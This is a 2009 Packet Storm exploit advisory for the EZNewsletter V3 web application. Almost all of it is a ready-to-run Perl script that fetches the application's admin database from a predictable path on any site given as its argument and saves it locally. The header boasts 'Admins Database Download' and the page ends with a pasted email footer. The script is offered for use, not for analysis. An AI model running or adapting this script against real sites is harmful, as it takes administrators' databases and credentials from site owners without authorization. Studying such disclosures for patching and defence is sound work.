EZNewsletter 3 Database Disclosure

2009-07-08T00:00:00
ID PACKETSTORM:79003
Type packetstorm
Reporter Septemb0x
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
#!/usr/bin/perl  
#############################################################  
# Application Name : EZNewsletter V3  
# Vulnerable Type : Arbitrary Database Disclosure Vulnerability  
# Infection : Admins Database Download  
# Script Downlaod : http://www.htmljunction.com/eznewsletterv3.zip  
# author : Septemb0x   
#############################################################  
# Greetz BHDR, BARCOD3  
  
use lwp::UserAgent;  
  
system('cls');  
system('title EZNewsletter V3 Remote Database Disclosure Exploit');  
system('color 2');  
if (!defined($ARGV[0])) {print "[!] Usage : \n perl exploit.pl http://sitename/path ";exit();}  
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }  
print "\n\n[-] EZNewsletter V3 Remote Database Disclosure Exploit\n";  
print "[+] Author : Septemb0x \n\n\n";  
print "[!] Exploiting $site ....\n";  
my $site = $ARGV[0] ;  
my $target = $site."/datastores/admin.mdb" ;  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($target,":content_file" => "c:/db.mdb");  
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb | Cyber-Warrior Bug Researcher Group | Septemb0x...";exit();}  
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}  
_________________________________________________________________  
Sadece e-posta iletilerinden daha fazlasý: Diðer Windows Live™ özelliklerine göz atýn.  
http://www.microsoft.com/turkiye/windows/windowslive/`